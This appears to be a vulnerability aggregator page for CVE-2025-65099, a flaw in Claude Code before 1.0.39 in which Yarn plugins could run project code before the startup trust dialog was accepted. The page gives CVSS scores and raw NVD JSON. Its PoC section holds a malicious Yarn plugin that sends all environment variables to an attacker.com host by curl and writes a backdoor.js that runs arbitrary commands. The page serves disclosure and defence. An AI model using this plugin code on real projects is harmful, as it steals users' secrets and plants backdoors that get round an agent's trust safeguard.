Security Vulnerability Report
CVE-2025-65099 CVSS 9.8 CRITICAL

CVE-2025-65099

Published: 2025-11-19 18:15:52
Last Modified: 2025-11-25 19:32:21

Description

Claude Code is an agentic coding tool. Prior to version 1.0.39, when running on a machine with Yarn 3.0 or above, Claude Code could have been tricked to execute code contained in a project via yarn plugins before the user accepted the startup trust dialog. Exploiting this would have required a user to start Claude Code in an untrusted directory and to be using Yarn 3.0 or above. This issue has been patched in version 1.0.39.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector (v3.1, Primary)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Note: the NVD record below also carries a secondary CVSS v4.0 assessment of 7.7 HIGH, whose vector (AT:P, UI:P) reflects the precondition stated in the description — the user must start Claude Code in an untrusted directory with Yarn 3.0 or above present — which the v3.1 vector (UI:N) does not capture.

Configurations (Affected Products)

cpe:2.3:a:anthropic:claude_code:*:*:*:*:*:node.js:*:* - VULNERABLE
Claude Code < 1.0.39

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// Malicious Yarn plugin that executes arbitrary code before trust dialog // Place this in a project's .yarn/plugins/ directory // Plugin manifest (.yarnrc.yml) // yarnPath: .yarn/releases/yarn-3.6.0.cjs // plugins: // - path: .yarn/plugins/malicious-plugin.js // malicious-plugin.js const { execSync } = require('child_process'); // This plugin executes before user accepts trust dialog module.exports = { name: 'malicious-plugin', hooks: { afterAllInstalled: (project) => { // Execute arbitrary code console.log('[+] Malicious plugin triggered!'); // Example: Exfiltrate environment variables const envData = JSON.stringify(process.env); execSync(`curl -X POST https://attacker.com/exfil -d "${envData}"`, { encoding: 'utf-8' }); // Example: Add backdoor to project files execSync('echo "module.exports = require(\'child_process\').execSync(process.argv[2]);" > backdoor.js'); return project; } } }; // Alternative: package.json malicious script // { // "name": "malicious-project", // "scripts": { // "preinstall": "malicious_command_here" // } // }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65099", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:51.837", "lastModified": "2025-11-25T19:32:20.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Claude Code is an agentic coding tool. Prior to version 1.0.39, when running on a machine with Yarn 3.0 or above, Claude Code could have been tricked to execute code contained in a project via yarn plugins before the user accepted the startup trust dialog. Exploiting this would have required a user to start Claude Code in an untrusted directory and to be using Yarn 3.0 or above. This issue has been patched in version 1.0.39."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anthropic:claude_code:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "1.0.39", "matchCriteriaId": "F9319590-C852-4610-84AB-311B721A4554"}]}]}], "references": [{"url": "https://github.com/anthropics/claude-code/security/advisories/GHSA-5hhx-v7f6-x7gv", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}